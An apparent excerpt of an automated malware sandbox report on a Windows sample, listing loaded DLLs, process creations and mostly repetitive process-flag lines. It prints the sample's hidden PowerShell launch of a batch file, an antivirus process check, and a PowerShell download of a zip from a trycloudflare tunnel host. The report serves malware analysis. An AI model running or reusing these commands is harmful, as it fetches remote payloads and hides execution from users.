Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\tasklist.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: <p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor has a new optional <em>readrc</em> argument source: 3.6.html.19.dr
Source: Binary string: <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> script file.</p></li> source: 3.2.html.19.dr
Source: Binary string: <li><p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor now accepts a <em>nosigint</em> argument.</p></li> source: 3.2.html.19.dr
Source: Binary string: <li><a href="library/pdb.html#index-1">Pdb (class in pdb)</a>, <a href="library/pdb.html#pdb.Pdb">[1]</a> source: genindex-P.html.19.dr
Source: Binary string: <p>On Windows now <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> supports <code class="docutils literal notranslate"><span class="pre">~/.pdbrc</span></code>. source: 3.9.html.19.dr
Source: Binary string: <li><p>A <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> script file can contain <code class="docutils literal notranslate"><span class="pre">continue</span></code> and <code class="docutils literal notranslate"><span class="pre">next</span></code> commands source: 3.2.html.19.dr
Source: Binary string: <li><a href="library/pdb.html#index-2">.pdbrc</a> source: genindex-F.html.19.dr
Source: Binary string: to control whether <code class="docutils literal notranslate"><span class="pre">.pdbrc</span></code> files should be read.</p> source: 3.6.html.19.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\uty.bat\" hidden' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\uty.bat\" hidden' -WindowStyle Hidden" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF7C6BC51E4 push E85B7A40h; ret 11_2_00007FF7C6BC51F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF7C6BC1D9F push esp; iretd 11_2_00007FF7C6BC2043
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF7C6BC2AFB push eax; iretd 11_2_00007FF7C6BC2B11

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
